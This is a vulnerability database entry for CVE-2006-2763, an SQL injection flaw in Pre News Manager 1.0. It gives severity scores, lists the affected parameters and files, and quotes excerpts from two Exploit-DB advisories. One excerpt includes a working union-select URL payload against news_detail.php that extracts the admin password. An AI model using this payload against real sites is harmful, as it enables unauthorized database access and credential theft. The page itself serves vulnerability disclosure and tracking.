CVE-2006-2763
published 2006-06-02CVE-2006-2763: SQL injection vulnerability in Pre News Manager 1.0 allows remote attackers to execute arbitrary SQL commands via the (1) id parameter to (a) index.php, and…
PriorityP336medium6.4CVSS 2.0
AVNACLAuNCPIPAN
EXPLOIT
EPSS
2.87%
85.0th percentile
SQL injection vulnerability in Pre News Manager 1.0 allows remote attackers to execute arbitrary SQL commands via the (1) id parameter to (a) index.php, and the (2) nid parameter to (b) news_detail.php, (c) email_story.php, (d) thankyou.php, (e) printable_view.php, (f) tella_friend.php, and (g) send_comments.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. It is possible that this is primary to CVE-2006-2678.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pre_projects | pre_news_manager | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Pre News Manager 1.0 - 'id' SQL Injection
exploitdb·2008-06-13
CVE-2006-2763 Pre News Manager 1.0 - 'id' SQL Injection
Pre News Manager 1.0 - 'id' SQL Injection
---
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_97$2008
[ECHO_ADV_97$2008] Pre News Manager <= 1.0 (index.php id) Sql Injection Vulnerability
Author : M.Hasran Addahroni
Date : June, 13 th 2008
Location : Jakarta, Indonesia
Web : http://e-rdc.org/v1/news.php?readmore=97
Critical Lvl : Medium
Impact : System access
Where : From Remote
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Pre News Manager
version : <= 1.0
Vendor : http://www.preproject.com/news.asp
Description :
Pre News Manager is online news publishing system. Very easy to manage and integration. Powerful online news mana
Exploit-DB
Pre News Manager 1.0 - SQL Injection
exploitdb·2007-05-03
CVE-2006-2763 Pre News Manager 1.0 - SQL Injection
Pre News Manager 1.0 - SQL Injection
---
Pre News Manager v1.0 Remote SQL Injection
Found: Cyber-Security.org
Script site: http://www.preproject.com/news.asp
Exploit:
news_detail.php?nid=-1/**/union/**/select/**/0,1,2,password,4,5,6/**/from/**/admin/*
Example: http://www.preproject.com/news%20manager/
# milw0rm.com [2007-05-03]
No writeups or analysis indexed.
http://secunia.com/advisories/20284http://www.osvdb.org/26073http://www.osvdb.org/26074http://www.osvdb.org/26075http://www.osvdb.org/26076http://www.osvdb.org/26077http://www.osvdb.org/26078http://www.osvdb.org/26079http://www.securityfocus.com/archive/1/493369/100/0/threadedhttp://www.securityfocus.com/archive/1/497185/100/0/threadedhttp://www.securityfocus.com/archive/1/497219/100/0/threadedhttp://www.vupen.com/english/advisories/2006/1990https://exchange.xforce.ibmcloud.com/vulnerabilities/34035https://exchange.xforce.ibmcloud.com/vulnerabilities/43070https://www.exploit-db.com/exploits/5803http://secunia.com/advisories/20284http://www.osvdb.org/26073http://www.osvdb.org/26074http://www.osvdb.org/26075http://www.osvdb.org/26076http://www.osvdb.org/26077http://www.osvdb.org/26078http://www.osvdb.org/26079http://www.securityfocus.com/archive/1/493369/100/0/threadedhttp://www.securityfocus.com/archive/1/497185/100/0/threadedhttp://www.securityfocus.com/archive/1/497219/100/0/threadedhttp://www.vupen.com/english/advisories/2006/1990https://exchange.xforce.ibmcloud.com/vulnerabilities/34035https://exchange.xforce.ibmcloud.com/vulnerabilities/43070https://www.exploit-db.com/exploits/5803
2006-06-02
Published